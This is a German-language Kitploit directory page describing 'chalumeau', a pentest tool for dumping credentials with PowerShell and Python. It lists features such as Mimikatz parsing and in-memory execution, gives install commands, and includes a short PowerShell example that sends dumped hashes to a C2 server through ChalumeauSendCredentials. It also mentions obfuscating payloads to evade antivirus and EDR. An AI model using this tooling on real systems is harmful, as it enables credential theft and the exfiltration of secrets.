Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
chalumeau — Chalumeau ist ein automatisiertes,erweiterbares und anpassbares Tool zum Auslesen von Anmeldeinformationen basierend auf powershell und python. | Kitploit
Tools/GitHubGitHub/cyberstruggle/chalumeau
PasswortangriffePost-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubcyberstruggle/chalumeau

chalumeau

Chalumeau ist ein automatisiertes,erweiterbares und anpassbares Tool zum Auslesen von Anmeldeinformationen basierend auf powershell und python.

Repository anzeigen
10219vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen


Chalumeau

Chalumeau ist ein automatisiertes, erweiterbares und anpassbares Tool zum Auslesen von Anmeldeinformationen, das auf powershell und python basiert.

Hauptfunktionen

  • Eigene Payloads schreiben
  • In-Memory Ausführung
  • Passwortliste extrahieren
  • Dashboard-Berichte / Web-Oberfläche
  • Mimikatz parsen
  • Tickets auslesen

Screenshots


Bekannte Probleme

  • Parsing Mimikatz dcsync (Fehlerbehebung in Arbeit)
  • Umgehung von Antiviren- und EDR-Lösungen; Sie müssen Ihre Payloads warten

TODO

  • Verschlüsselte Kommunikation
  • Automatisierte laterale Bewegung
  • Automatisiertes Password Spraying
  • Automatisiertes Hash-Cracking

Verwendung

root@kitploit:~
git clone https://github.com/cyberstruggle/chalumeau.git
cd chalumeau/
chmod +x install.sh
sudo ./install.sh

# Run
chmod +x start.sh

sudo ./start.sh

Eigenen Payload schreiben

Verschleiern Sie Ihren eigenen PowerShell-Payload zum Auslesen von Anmeldeinformationen und verwenden Sie den Chalumeau-Funktionsaufruf ohne Importe. Chalumeau verschlüsselt die Kommunikation mit dem C2 und sendet die extrahierten Anmeldeinformationen. Speichern Sie die Datei einfach unter chalumeau-power/payloads.

  • Verwendung der ChalumeauSendCredentials-Funktion
    • ChalumeauSendCredentials
      • Secret = der extrahierte Hash oder das Klartext-Passwort (Zeichenkette)
      • Username = der Benutzername oder die ID der extrahierten Anmeldeinformationen (Zeichenkette)
      • IsClearText = 1, wenn es sich um Klartext handelt, sonst 0 (int)
      • Source = Quell-Payload angeben, z.B. "Mimikatz Hash" (Zeichenkette)
root@kitploit:~
# Custom Payload Example
# $DumpedHashes is array of dumped hashes from the local machine
foreach ($hash in $DumpedHashes){
    ChalumeauSendCredentials -Secret $hash.secret -Username $hash.user -IsClearText 0 -source "My custom payload"
} 

Credits

  • wazehell Autor
  • Invoke-Obfuscation Daniel Bohannon
  • Invoke-Mimikatz PowerSploit
  • Get-PassHashes nishang
  • Chalumeau Logo Aureliano
  • Invoke-MassMimikatz PowerTools
Tool herunterladen